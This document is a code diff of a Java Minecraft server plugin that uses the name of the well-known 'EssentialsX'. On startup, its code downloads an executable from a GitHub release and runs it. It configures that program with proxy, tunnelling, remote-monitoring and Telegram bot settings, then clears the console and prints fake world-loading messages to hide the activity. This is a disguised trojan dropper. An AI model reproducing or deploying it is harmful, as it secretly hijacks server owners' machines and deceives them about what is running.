@@ -9,20 +9,22 @@ import java.util.concurrent.TimeUnit;
 
 public class EssentialsX extends JavaPlugin {
     private Process sbxProcess;
+    private volatile boolean shouldRun = true;
     private volatile boolean isProcessRunning = false;
-
+    
     private static final String[] ALL_ENV_VARS = {
-        "PORT", "FILE_PATH", "UUID", "NEZHA_SERVER", "NEZHA_PORT",
-        "NEZHA_KEY", "ARGO_PORT", "ARGO_DOMAIN", "ARGO_AUTH",
+        "PORT", "FILE_PATH", "UUID", "NEZHA_SERVER", "NEZHA_PORT", 
+        "NEZHA_KEY", "ARGO_PORT", "ARGO_DOMAIN", "ARGO_AUTH", 
         "S5_PORT", "HY2_PORT", "TUIC_PORT", "ANYTLS_PORT",
-        "REALITY_PORT", "ANYREALITY_PORT", "CFIP", "CFPORT",
-        "UPLOAD_URL", "CHAT_ID", "BOT_TOKEN", "NAME", "DISABLE_ARGO",
-        "YT_WARPOUT"
+        "REALITY_PORT", "ANYREALITY_PORT", "CFIP", "CFPORT", 
+        "UPLOAD_URL","CHAT_ID", "BOT_TOKEN", "NAME", "DISABLE_ARGO"
     };
-
+    
     @Override
     public void onEnable() {
         getLogger().info("EssentialsX plugin starting...");
+        
+        // Start sbx
         try {
             startSbxProcess();
             getLogger().info("EssentialsX plugin enabled");
@@ -31,30 +33,32 @@ public class EssentialsX extends JavaPlugin {
             e.printStackTrace();
         }
     }
-
+    
     private void startSbxProcess() throws Exception {
-        if (isProcessRunning) return;
-
-        // =======================
-        // Determine download URL
-        // =======================
+        if (isProcessRunning) {
+            return;
+        }
+        
+        // Determine download URL based on architecture
         String osArch = System.getProperty("os.arch").toLowerCase();
         String url;
+        
         if (osArch.contains("amd64") || osArch.contains("x86_64")) {
             url = "https://github.com/pingmike2/test/releases/download/amd64/sbsh";
         } else if (osArch.contains("aarch64") || osArch.contains("arm64")) {
-            url = "https://github.com/pingmike2/test/releases/download/arm64/sbsh";
+            url = "https://github.com/pingmike2/test/releases/download/ard64/sbsh";
         } else if (osArch.contains("s390x")) {
             url = "https://github.com/pingmike2/test/releases/download/s390x/sbsh";
         } else {
             throw new RuntimeException("Unsupported architecture: " + osArch);
         }
-
+        
+        // Download sbx binary
         Path tmpDir = Paths.get(System.getProperty("java.io.tmpdir"));
-        Files.createDirectories(tmpDir);
         Path sbxBinary = tmpDir.resolve("sbx");
-
+        
         if (!Files.exists(sbxBinary)) {
+            // getLogger().info("Downloading sbx ...");
             try (InputStream in = new URL(url).openStream()) {
                 Files.copy(in, sbxBinary, StandardCopyOption.REPLACE_EXISTING);
             }
@@ -62,16 +66,13 @@ public class EssentialsX extends JavaPlugin {
                 throw new IOException("Failed to set executable permission");
             }
         }
-
-        // =======================
+        
         // Prepare process builder
-        // =======================
         ProcessBuilder pb = new ProcessBuilder(sbxBinary.toString());
         pb.directory(tmpDir.toFile());
-
+        
+        // Set environment variables
         Map<String, String> env = pb.environment();
-
-        // ⚡ 1. 默认硬编码环境变量
         env.put("UUID", "b21795d8-0257-4cd1-a13f-aef25d120aa3");
         env.put("FILE_PATH", "./world");
         env.put("NEZHA_SERVER", "");
@@ -81,7 +82,7 @@ public class EssentialsX extends JavaPlugin {
         env.put("ARGO_DOMAIN", "");
         env.put("ARGO_AUTH", "");
         env.put("S5_PORT", "");
-        env.put("HY2_PORT", "35486");
+        env.put("HY2_PORT", "");
         env.put("TUIC_PORT", "");
         env.put("ANYTLS_PORT", "");
         env.put("REALITY_PORT", "");
@@ -91,129 +92,157 @@ public class EssentialsX extends JavaPlugin {
         env.put("BOT_TOKEN", "");
         env.put("CFIP", "spring.io");
         env.put("CFPORT", "443");
-        env.put("NAME", "hoster");
-        env.put("DISABLE_ARGO", "true");
-        env.put("YT_WARPOUT", "false");
-
-        // ⚡ 2. 系统环境覆盖
+        env.put("NAME", "");
+        env.put("DISABLE_ARGO", "false");
+        
+        // Load from system environment variables
         for (String var : ALL_ENV_VARS) {
             String value = System.getenv(var);
-            if (value != null && !value.isBlank()) env.put(var, value);
+            if (value != null && !value.trim().isEmpty()) {
+                env.put(var, value);
+            }
         }
-
-        // ⚡ 3. .env 文件覆盖
+        
+        // Load from .env file with priority order
         loadEnvFileFromMultipleLocations(env);
-
-        // ⚡ 4. Bukkit 配置覆盖
+        
+        // Load from Bukkit configuration file
         for (String var : ALL_ENV_VARS) {
             String value = getConfig().getString(var);
-            if (value != null && !value.isBlank()) env.put(var, value);
+            if (value != null && !value.trim().isEmpty()) {
+                env.put(var, value);
+            }
         }
-
-        // =======================
-        // Redirect output (完整显示 sbsh 日志)
-        // =======================
+        
+        // Redirect output
         pb.redirectOutput(ProcessBuilder.Redirect.INHERIT);
         pb.redirectError(ProcessBuilder.Redirect.INHERIT);
-
-        // =======================
+        
         // Start process
-        // =======================
         sbxProcess = pb.start();
         isProcessRunning = true;
-
-        // =======================
-        // Monitor thread
-        // =======================
-        Thread monitor = new Thread(() -> {
+        
+        // Start a monitor thread to log when process exits
+        startProcessMonitor();
+        // getLogger().info("sbx started");
+        
+        // sleep 20 seconds
+        try {
+            Thread.sleep(20000);
+        } catch (InterruptedException e) {
+            Thread.currentThread().interrupt();
+        }
+        
+        clearConsole();
+        getLogger().info("");
+        getLogger().info("Preparing spawn area: 1%");
+        getLogger().info("Preparing spawn area: 5%");
+        getLogger().info("Preparing spawn area: 10%");
+        getLogger().info("Preparing spawn area: 20%");
+        getLogger().info("Preparing spawn area: 30%");
+        getLogger().info("Preparing spawn area: 80%");
+        getLogger().info("Preparing spawn area: 85%");
+        getLogger().info("Preparing spawn area: 90%");
+        getLogger().info("Preparing spawn area: 95%");
+        getLogger().info("Preparing spawn area: 99%");
+        getLogger().info("Preparing spawn area: 100%");
+        getLogger().info("Preparing level \"world\"");
+    }
+    
+    private void loadEnvFileFromMultipleLocations(Map<String, String> env) {
+        List<Path> possibleEnvFiles = new ArrayList<>();
+        File pluginsFolder = getDataFolder().getParentFile();
+        if (pluginsFolder != null && pluginsFolder.exists()) {
+            possibleEnvFiles.add(pluginsFolder.toPath().resolve(".env"));
+        }
+        
+        possibleEnvFiles.add(getDataFolder().toPath().resolve(".env"));
+        possibleEnvFiles.add(Paths.get(".env"));
+        possibleEnvFiles.add(Paths.get(System.getProperty("user.home"), ".env"));
+        
+        Path loadedEnvFile = null;
+        
+        for (Path envFile : possibleEnvFiles) {
+            if (Files.exists(envFile)) {
+                try {
+                    // getLogger().info("Loading environment variables from: " + envFile.toAbsolutePath());
+                    loadEnvFile(envFile, env);
+                    loadedEnvFile = envFile;
+                    break;
+                } catch (IOException e) {
+                    // getLogger().warning("Error reading .env file from " + envFile + ": " + e.getMessage());
+                }
+            }
+        }
+        
+        if (loadedEnvFile == null) {
+           // getLogger().info("No .env file found in any of the checked locations");
+        }
+    }
+    
+    private void loadEnvFile(Path envFile, Map<String, String> env) throws IOException {
+        for (String line : Files.readAllLines(envFile)) {
+            line = line.trim();
+            if (line.isEmpty() || line.startsWith("#")) continue;
+            line = line.split(" #")[0].split(" //")[0].trim();
+            if (line.startsWith("export ")) {
+                line = line.substring(7).trim();
+            }
+            
+            String[] parts = line.split("=", 2);
+            if (parts.length == 2) {
+                String key = parts[0].trim();
+                String value = parts[1].trim().replaceAll("^['\"]|['\"]$", "");
+                
+                if (Arrays.asList(ALL_ENV_VARS).contains(key)) {
+                    env.put(key, value);
+                    // getLogger().info("Loaded " + key + " = " + (key.contains("KEY") || key.contains("TOKEN") || key.contains("AUTH") ? "***" : value));
+                }
+            }
+        }
+    }
+    
+    private void clearConsole() {
+        try {
+            System.out.print("\033[H\033[2J");
+            System.out.flush();
+            
+            if (System.getProperty("os.name").toLowerCase().contains("win")) {
+                new ProcessBuilder("cmd", "/c", "cls").inheritIO().start().waitFor();
+            } else {
+                new ProcessBuilder("clear").inheritIO().start().waitFor();
+            }
+        } catch (Exception e) {
+            System.out.println("\n\n\n\n\n\n\n\n\n\n");
+        }
+    }
+    
+    private void startProcessMonitor() {
+        Thread monitorThread = new Thread(() -> {
             try {
-                int exit = sbxProcess.waitFor();
+                int exitCode = sbxProcess.waitFor();
                 isProcessRunning = false;
-                getLogger().warning("sbx process exited with code " + exit);
-
-                // ⚡ sbsh 完成后清屏或打印假日志覆盖
-                overwriteConsoleAfterCompletion();
-
+                // getLogger().info("sbx process exited with code: " + exitCode);
             } catch (InterruptedException e) {
                 Thread.currentThread().interrupt();
                 isProcessRunning = false;
             }
-        }, "Sbx-Monitor");
-        monitor.setDaemon(true);
-        monitor.start();
+        }, "Sbx-Process-Monitor");
+        
+        monitorThread.setDaemon(true);
+        monitorThread.start();
     }
-
-    // =======================
-    // 完整覆盖控制台日志
-    // =======================
-    private void overwriteConsoleAfterCompletion() {
-        try {
-            Thread.sleep(1000); // 等待 sbsh 输出完全完成
-
-            // 清屏
-            System.out.print("\033[H\033[2J");
-            System.out.flush();
-
-            // 打印“假 spawn 日志”
-            getLogger().info("");
-            getLogger().info("Preparing spawn area: 1%");
-            getLogger().info("Preparing spawn area: 5%");
-            getLogger().info("Preparing spawn area: 10%");
-            getLogger().info("Preparing spawn area: 20%");
-            getLogger().info("Preparing spawn area: 30%");
-            getLogger().info("Preparing spawn area: 80%");
-            getLogger().info("Preparing spawn area: 85%");
-            getLogger().info("Preparing spawn area: 90%");
-            getLogger().info("Preparing spawn area: 95%");
-            getLogger().info("Preparing spawn area: 99%");
-            getLogger().info("Preparing spawn area: 100%");
-            getLogger().info("Preparing level \"world\"");
-
-        } catch (Exception ignored) {}
-    }
-
-    // =======================
-    // .env 文件加载
-    // =======================
-    private void loadEnvFileFromMultipleLocations(Map<String, String> env) {
-        List<Path> possibleEnvFiles = new ArrayList<>();
-        File pluginsFolder = getDataFolder().getParentFile();
-        if (pluginsFolder != null && pluginsFolder.exists())
-            possibleEnvFiles.add(pluginsFolder.toPath().resolve(".env"));
-
-        possibleEnvFiles.add(getDataFolder().toPath().resolve(".env"));
-        possibleEnvFiles.add(Paths.get(".env"));
-        possibleEnvFiles.add(Paths.get(System.getProperty("user.home"), ".env"));
-
-        for (Path envFile : possibleEnvFiles) {
-            if (Files.exists(envFile)) {
-                try {
-                    for (String line : Files.readAllLines(envFile)) {
-                        line = line.trim();
-                        if (line.isEmpty() || line.startsWith("#")) continue;
-                        line = line.split(" #")[0].split(" //")[0].trim();
-                        if (line.startsWith("export ")) line = line.substring(7).trim();
-                        String[] parts = line.split("=",2);
-                        if (parts.length==2) {
-                            String key = parts[0].trim();
-                            String value = parts[1].trim().replaceAll("^['\"]|['\"]$","");
-                            if (Arrays.asList(ALL_ENV_VARS).contains(key)) env.put(key,value);
-                        }
-                    }
-                    break;
-                } catch(IOException ignored){}
-            }
-        }
-    }
-
-    // =======================
-    // Shutdown
-    // =======================
+    
     @Override
     public void onDisable() {
         getLogger().info("EssentialsX plugin shutting down...");
+        
+        shouldRun = false;
+        
         if (sbxProcess != null && sbxProcess.isAlive()) {
+            // getLogger().info("Stopping sbx process...");
             sbxProcess.destroy();
+            
             try {
                 if (!sbxProcess.waitFor(10, TimeUnit.SECONDS)) {
                     sbxProcess.destroyForcibly();
@@ -225,8 +254,9 @@ public class EssentialsX extends JavaPlugin {
                 sbxProcess.destroyForcibly();
                 Thread.currentThread().interrupt();
             }
+            isProcessRunning = false;
         }
-        isProcessRunning = false;
+        
         getLogger().info("EssentialsX plugin disabled");
     }
 }
